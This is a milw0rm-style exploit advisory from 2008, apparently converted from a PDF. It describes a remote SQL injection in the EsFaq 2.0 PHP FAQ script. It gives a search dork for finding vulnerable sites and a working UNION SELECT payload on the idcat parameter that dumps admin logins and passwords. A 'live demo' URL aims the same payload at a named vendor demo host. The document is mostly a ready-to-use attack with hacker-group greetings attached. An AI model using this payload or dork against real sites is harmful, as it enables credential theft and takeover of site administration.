EsFaq 2.0 idcat Remote SQL Injection Vulnerability.pdf

1 |___________________________________________________| 2 | 3 | EsFaq Remote Sql Injection Exploit 4 | 5 |___________________________________________________ 6 |−−−−−−−−−−−−−−−−−−−−−SuB−ZeRo−−−−−−−−−−−−−−−−−−−−−−| 7 | 8 | Author: SuB−ZeRo 9 | 10 | Home : www.dz−security.com 11 | 12 | email: FbH@hotmail.com 13 | 14 | 15 |___________________________________________________ 16 | | 17 | 18 | script :http://editeurscripts.com/ressources/scripts−php/dl.php?idscript=5 19 | 20 | DorK : inurl:questions.php?idcat 21 |___________________________________________________| 22 Exploit: 23 ________ 24 25 www.[target].com/Script/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_us ers−− 26 27 28 29 L!VE DEMO: 30 _________ 31 http://demo.editeurscripts.com/EsFaq/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users−− 32 33 ____________ 34 35 ____________________________( Greetz )_________________________________ 36 | 37 | All members of the Forum www.dz−security.com and www.no−exploit.com 38 | 39 | My friends : HiSoK4| x.CJP.x | bibi−infi | ThE BuTcHeR | charaf 40 | 41 | and all algeria hackers and all mouslimme 42 |__________________________ramadan karim all mouslimme____________________________________________ 43 44 # milw0rm.com [2008−09−05] Page 1/1 EsFaq 2.0 idcat Remote SQL Injection Vulnerability SuB−ZeRo 09/05/2008